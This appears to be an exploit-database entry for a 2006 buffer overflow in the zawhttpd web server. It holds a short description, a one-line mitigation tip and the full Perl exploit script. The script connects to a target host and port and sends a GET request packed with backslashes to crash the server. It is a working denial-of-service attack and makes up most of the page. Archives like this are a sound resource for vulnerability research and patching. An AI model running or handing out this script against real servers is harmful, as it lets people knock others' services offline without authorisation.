header-logo
Suggest Exploit
vendor:
zawhttpd
by:
Kamil 'K3' Sienicki
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: zawhttpd
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

zawhttpd Buffer Overflow Exploit

This exploit attempts to kill zawhttpd by sending a malicious GET request to the server. The malicious request contains a large number of backslashes which can cause a buffer overflow and crash the server.

Mitigation:

Ensure that the server is running the latest version of zawhttpd and that all security patches are up to date.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
                PeerAddr => $ARGV[0],
                PeerPort => $ARGV[1],
                Proto => "TCP"))
{
        print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
        print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
        close($socket);
}
else
{
        print "perl zawhttpd.pl localhost 80 \n";
        print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
#EoF 

# milw0rm.com [2006-05-04]